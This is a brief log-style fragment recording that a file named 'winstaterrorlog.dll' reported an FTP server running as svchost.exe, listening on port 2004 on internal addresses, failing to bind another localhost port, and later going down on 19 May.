 The file "winstaterrorlog.dll" reported that FTP Server (svchost.exe) started, listening on ports 2004 (10.6.4.119, 10.6.3.19 & loclhost) and that is could not listen on port 43958 (localhost) as this port was already in use.

# 19 May 13:23

• The file "winstaterrorlog.dll" reported that FTP Server (svchost.exe) "was going down".